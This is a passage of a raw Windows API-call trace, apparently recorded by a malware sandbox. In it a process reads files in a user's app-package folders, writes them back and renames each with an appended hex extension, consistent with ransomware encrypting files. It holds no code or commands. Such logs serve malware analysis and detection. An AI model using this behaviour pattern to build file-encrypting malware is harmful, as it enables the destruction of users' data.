lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58\\15_10.0.0[1].json.38566CACE4363A34304D3295DD3DAE9871EB1D9C225868F7FE23422CD477F27F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\AC\\INetCache\\TCKLQR58\\15_10.0.0[1].json.38566CACE4363A34304D3295DD3DAE9871EB1D9C225868F7FE23422CD477F27F" [0116.096] GetProcessHeap () returned 0x600000 [0116.096] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1aa) returned 0x31629b8 [0116.096] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x25fff60, FileInformation=0x31629b8, Length=0x1aa, FileInformationClass=0xa) returned 0x0 [0116.097] CloseHandle (hObject=0x324) returned 1 [0116.097] GetProcessHeap () returned 0x600000 [0116.097] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0116.097] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.179] ReadFile (in: hFile=0x32c, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.180] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.180] WriteFile (in: hFile=0x32c, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.185] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.185] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x25fff70) returned 0x0 [0116.186] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\shared.xml", lpString2=".F4E3A3974D6E9358E37CA294067B4B874932BC73CC44CAB2F26D1AE045743723" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\shared.xml.F4E3A3974D6E9358E37CA294067B4B874932BC73CC44CAB2F26D1AE045743723") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Messaging_8wekyb3d8bbwe\\LocalState\\shared.xml.F4E3A3974D6E9358E37CA294067B4B874932BC73CC44CAB2F26D1AE045743723" [0116.186] GetProcessHeap () returned 0x600000 [0116.186] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x186) returned 0x6b2140 [0116.186] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x25fff60, FileInformation=0x6b2140, Length=0x186, FileInformationClass=0xa) returned 0x0 [0116.187] CloseHandle (hObject=0x32c) returned 1 [0116.188] GetProcessHeap () returned 0x600000 [0116.188] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.188] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.308] ReadFile (in: hFile=0x318, lpBuffer=0x32c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048) returned 1 [0116.308] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.330] WriteFile (in: hFile=0x33c, lpBuffer=0x32e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0) returned 1 [0116.334] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.450] WriteFile (in: hFile=0x31c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0116.455] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.457] WriteFile (in: hFile=0x32c, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0116.457] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0116.891] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x25fff70) returned 0x0 [0116.891] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings\\settings.dat", lpString2=".4AB2B618E3043D9B7B17F461D5961FDD4F35A7B3439CDB1396B6BDCC29B74D53" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings\\settings.dat.4AB2B618E3043D9B7B17F461D5961FDD4F35A7B3439CDB1396B6BDCC29B74D53") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\Settings\\settings.dat.4AB2B618E3043D9B7B17F461D5961FDD4F35A7B3439CDB1396B6BDCC29B74D53" [0116.891] GetProcessHeap () returned 0x600000 [0116.891] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x190) returned 0x6b32c8 [0116.891] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x25fff60, FileInformation=0x6b32c8, Length=0x190, FileInformationClass=0xa) returned 0x0 [0116.896] CloseHandle (hObject=0x214) returned 1 [0116.896] GetProcessHeap () returned 0x600000 [0116.896] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.897] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0117.423] ReadFile (in: hFile=0x214, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0117.423] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0117.469] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x25fff70) returned 0x0 [0117.470] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".7B99422012CA8D1A6F04730C2831895992070B394DA659F405E8B00B4D5BC179" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.7B99422012CA8D1A6F04730C2831895992070B394DA659F405E8B00B4D5BC179") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.7B99422012CA8D1A6F04730C2831895992070B394DA659F405E8B00B4D5BC179" [0117.470] GetProcessHeap () returned 0x600000 [0117.470] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1fc) returned 0x634d20 [0117.470] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x25fff60, FileInformation=0x634d20, Length=0x1fc, FileInformationClass=0xa) returned 0x0 [0117.548] CloseHandle (hObject=0x324) returned 1 [0117.548] GetProcessHeap () returned 0x600000 [0117.549] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0117.550] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0117.789] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0117.789] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat", lpString2=".D42352312407D03111C330095851D71D39F9FE578B7277F5561A39F92DEB1E02" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.D42352312407D03111C330095851D71D39F9FE578B7277F5561A39F92DEB1E02") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\Microsoft.Office.Sway_17.6216.20251.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.D42352312407D03111C330095851D71D39F9FE578B7277F5561A39F92DEB1E02" [0117.789] GetProcessHeap () returned 0x600000 [0117.789] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x218) returned 0x63efb8 [0117.790] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x25fff60, FileInformation=0x63efb8, Length=0x218, FileInformationClass=0xa) returned 0x0 [0117.890] CloseHandle (hObject=0x32c) returned 1 [0117.891] GetProcessHeap () returned 0x600000 [0117.891] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0117.891] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0118.106] ReadFile (in: hFile=0x32c, lpBuffer=0x690478, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0118.106] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0118.107] WriteFile (in: hFile=0x214, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0118.108] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0118.198] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0118.198] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore\\ActivationStore.dat", lpString2=".7F4A14503B64DFFBA21DC17B108AA486F03B2226BC256A37E2A71F227B193934" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore\\ActivationStore.dat.7F4A14503B64DFFBA21DC17B108AA486F03B2226BC256A37E2A71F227B193934") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore\\ActivationStore.dat.7F4A14503B64DFFBA21DC17B108AA486F03B2226BC256A37E2A71F227B193934" [0118.198] GetProcessHeap () returned 0x600000 [0118.198] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1fc) returned 0x634f28 [0118.201] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x25fff60, FileInformation=0x634f28, Length=0x1fc, FileInformationClass=0xa) returned 0x0 [0118.256] CloseHandle (hObject=0x32c) returned 1 [0118.256] GetProcessHeap () returned 0x600000 [0118.256] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.257] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0118.305] WriteFile (in: hFile=0x32c, lpBuffer=0x690478, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0118.400] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0118.448] WriteFile (in: hFile=0x32c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0118.449] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0118.524] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0118.562] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0118.851] ReadFile (in: hFile=0x214, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x4200, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0118.860] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0118.865] NtQueryObject (in: Handle=0x214, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x25fff70) returned 0x0 [0118.865] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpString2=".248347B40FB688869386AB28D788C5F8A7DA3C41968751AA0938F61D119D983B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml.248347B40FB688869386AB28D788C5F8A7DA3C41968751AA0938F61D119D983B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml.248347B40FB688869386AB28D788C5F8A7DA3C41968751AA0938F61D119D983B" [0118.865] GetProcessHeap () returned 0x600000 [0118.865] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x208) returned 0x63fa80 [0118.865] NtSetInformationFile (FileHandle=0x214, IoStatusBlock=0x25fff60, FileInformation=0x63fa80, Length=0x208, FileInformationClass=0xa) returned 0x0 [0118.866] CloseHandle (hObject=0x214) returned 1 [0118.866] GetProcessHeap () returned 0x600000 [0118.866] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0118.869] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0118.938] ReadFile (in: hFile=0x338, lpBuffer=0x6a0480, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesRead=0x0, lpOverlapped=0x680348) returned 1 [0118.938] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0118.947] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x25fff70) returned 0x0 [0118.947] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", lpString2=".EE5A7C7CF032D95B7B6D5D7C674D0C2BD16390FCC83BF86AC538FD883101DB49" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png.EE5A7C7CF032D95B7B6D5D7C674D0C2BD16390FCC83BF86AC538FD883101DB49") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png.EE5A7C7CF032D95B7B6D5D7C674D0C2BD16390FCC83BF86AC538FD883101DB49" [0118.947] GetProcessHeap () returned 0x600000 [0118.947] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x24e) returned 0x624ec0 [0118.947] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x25fff60, FileInformation=0x624ec0, Length=0x24e, FileInformationClass=0xa) returned 0x0 [0118.948] CloseHandle (hObject=0x308) returned 1 [0118.949] GetProcessHeap () returned 0x600000 [0118.949] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0118.951] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.155] ReadFile (in: hFile=0x308, lpBuffer=0x32c0180, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048) returned 1 [0119.162] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.173] WriteFile (in: hFile=0x318, lpBuffer=0x6a0480*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348 | out: lpBuffer=0x6a0480*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x680348) returned 1 [0119.174] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.223] WriteFile (in: hFile=0x338, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0119.226] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.258] WriteFile (in: hFile=0x320, lpBuffer=0x690478, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0119.260] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.272] WriteFile (in: hFile=0x320, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0119.273] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0119.288] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0119.289] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbtmp.log", lpString2=".E2A8E41BB3BA0808B1AF50050BBCAB37B8816E3DB65993967370C3DCAE10B921" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbtmp.log.E2A8E41BB3BA0808B1AF50050BBCAB37B8816E3DB65993967370C3DCAE10B921") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edbtmp.log.E2A8E41BB3BA0808B1AF50050BBCAB37B8816E3DB65993967370C3DCAE10B921" [0119.289] GetProcessHeap () returned 0x600000 [0119.289] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a2) returned 0x62cf78 [0119.289] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x25fff60, FileInformation=0x62cf78, Length=0x1a2, FileInformationClass=0xa) returned 0x0 [0119.290] CloseHandle (hObject=0x320) returned 1 [0119.290] GetProcessHeap () returned 0x600000 [0119.290] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 